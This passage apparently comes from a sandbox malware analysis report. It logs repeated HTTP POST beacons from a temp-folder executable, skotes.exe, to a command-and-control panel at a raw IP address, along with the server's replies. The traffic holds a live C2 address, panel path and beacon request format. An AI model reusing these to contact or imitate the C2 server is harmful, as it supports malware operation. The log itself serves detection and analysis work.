Sep 25, 2024 07:59:21.659343958 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:22.371007919 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49725	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:24.005705118 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:24.705360889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49726	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:26.225436926 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:26.942253113 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49727	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:28.565680027 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:29.271599054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49728	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:30.910547018 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:31.615658998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49729	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:33.257971048 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:33.949970007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49730	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:35.472042084 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:36.178044081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49732	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:37.817636013 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:38.518563986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49733	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:40.048300028 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:40.750222921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49734	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:42.378098011 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:43.086662054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49735	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:44.618026972 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:45.332669020 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49736	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:46.956161976 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:47.687269926 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49737	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:49.209278107 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:49.916423082 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49738	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:51.550657988 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:52.250567913 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49739	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:53.770726919 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:54.498406887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49740	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:56.128221035 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 07:59:56.826505899 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49741	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 07:59:58.350466013 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 07:59:59.049371958 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 05:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49742	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:00.675582886 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 08:00:01.376663923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49743	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:02.927334070 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 08:00:03.623218060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49744	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:05.256890059 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 08:00:05.943475008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49745	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:07.456906080 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 08:00:08.154839993 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49746	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:09.786195993 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 08:00:10.495562077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49747	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:12.003570080 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 08:00:12.698942900 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49748	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

